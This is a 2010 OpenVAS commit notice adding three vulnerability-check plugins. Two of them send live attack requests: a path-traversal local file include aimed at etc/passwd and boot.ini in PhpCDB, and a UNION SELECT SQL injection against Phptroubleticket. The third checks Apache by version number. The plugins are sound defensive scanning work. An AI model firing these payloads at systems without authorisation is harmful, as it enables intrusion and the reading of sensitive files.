[Openvas-commits] r6897 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Mar 4 12:28:08 CET 2010 

Author: mime
Date: 2010-03-04 12:28:05 +0100 (Thu, 04 Mar 2010)
New Revision: 6897

Added:
   trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
   trunk/openvas-plugins/scripts/gb_apache_38494.nasl
   trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/ChangeLog	2010-03-04 11:28:05 UTC (rev 6897)
@@ -1,3 +1,10 @@
+2010-03-04 Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/gb_apache_38494.nasl,
+	scripts/gb_PhpCDB_38507.nasl,
+	scripts/gb_phptroubleticket_38486.nasl:
+	Added new plugins.
+
 2010-03-04  Michael Wiegand <michael.wiegand at intevation.de>
 
 	* scripts/cpe_inventory.nasl: Set proto strings so they can be

Added: trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl	2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl	2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PhpCDB 'lang_global' Parameter Multiple Local File Include Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100516);
+ script_bugtraq_id(38507);
+ script_version ("1.0-$Revision$");
+
+ script_name("PhpCDB 'lang_global' Parameter Multiple Local File Include Vulnerabilities");
+
+desc = "Overview:
+PhpCDB is prone to multiple local file-include vulnerabilities because
+it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain
+potentially sensitive information and execute arbitrary local
+scripts in the context of the webserver process. This may allow
+the attacker to compromise the application and the computer; other
+attacks are also possible.
+
+PhpCDB 1.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/38507
+http://sourceforge.net/projects/phpcdb/
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if PhpCDB is prone to local file-include vulnerabilities");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phpcdb",cgi_dirs());
+
+foreach dir (dirs) {
+  foreach file (make_list("etc/passwd", "boot.ini")) {
+   
+    url = string(dir,"/firstvisit.php?lang_global=../../../../../../../../../",file,"%00"); 
+    req = http_get(item:url, port:port);
+    buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
+    if( buf == NULL )continue;
+
+    if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string: buf)) {
+     
+      security_warning(port:port);
+      exit(0);
+
+    }
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_PhpCDB_38507.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_apache_38494.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apache_38494.nasl	2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_apache_38494.nasl	2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apache Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100514);
+ script_bugtraq_id(38494,38491);
+ script_cve_id("CVE-2010-0425","CVE-2010-0434","CVE-2010-0408");
+ script_version ("1.0-$Revision$");
+
+ script_name("Apache Multiple Security Vulnerabilities");
+
+desc = "Overview:
+Apache is prone to multiple vulnerabilities.
+
+These issues may lead to information disclosure or other attacks.
+
+Apache versions prior to 2.2.15-dev are affected.
+
+Solution:
+These issues have been addressed in Apache 2.2.15-dev. Apache 2.2.15
+including fixes will become available in the future as well. Please
+see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/38494
+http://httpd.apache.org/security/vulnerabilities_22.html
+http://httpd.apache.org/
+https://issues.apache.org/bugzilla/show_bug.cgi?id=48359
+http://svn.apache.org/viewvc?view=revision&revision=917870
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if installed Apache version is <= 2.2.14");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("secpod_apache_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+httpdPort = get_http_port(default:80);
+if(!httpdPort){
+  exit(0);
+}
+
+version = get_kb_item("www/" + httpdPort + "/Apache");
+
+if(version != NULL){
+  if(version_in_range(version:version, test_version: "2.2",test_version2:"2.2.14")){
+    security_warning(port: httpdPort);
+    exit(0);
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_apache_38494.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl	2010-03-04 11:27:35 UTC (rev 6896)
+++ trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl	2010-03-04 11:28:05 UTC (rev 6897)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Phptroubleticket 'vedi_faq.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100515);
+ script_bugtraq_id(38486);
+ script_version ("1.0-$Revision$");
+
+ script_name("Phptroubleticket 'vedi_faq.php' SQL Injection Vulnerability");
+
+desc = "Overview:
+Phptroubleticket is prone to an SQL-injection vulnerability because it
+fails to sufficiently sanitize user-supplied data before using it in
+an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+Phptroubleticket 2.0 is vulnerable; other versions may also be
+affected.
+
+References:
+http://www.securityfocus.com/bid/38486
+http://www.phptroubleticket.org/downloads.html
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Phptroubleticket is prone to an SQL-injection vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phptt","/phpticket","/ticket",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/index.php"); 
+  req = http_get(item:url, port:port);
+  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
+  if( buf == NULL )continue;
+
+  if(egrep(pattern: "Powered by phptroubleticket", string: buf, icase: TRUE)) {
+
+    url = string(dir,"/vedi_faq.php?id=1%20union%20all%20select%201,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4%20from%20utenti");
+    req = http_get(item:url, port:port);
+    buf = http_keepalive_send_recv(port:port, data:req,bodyonly:FALSE);
+    if("OpenVAS-SQL-Injection-Test" >< buf) { 
+      security_warning(port:port);
+      exit(0);
+    }  
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_phptroubleticket_38486.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

More information about the Openvas-commits mailing list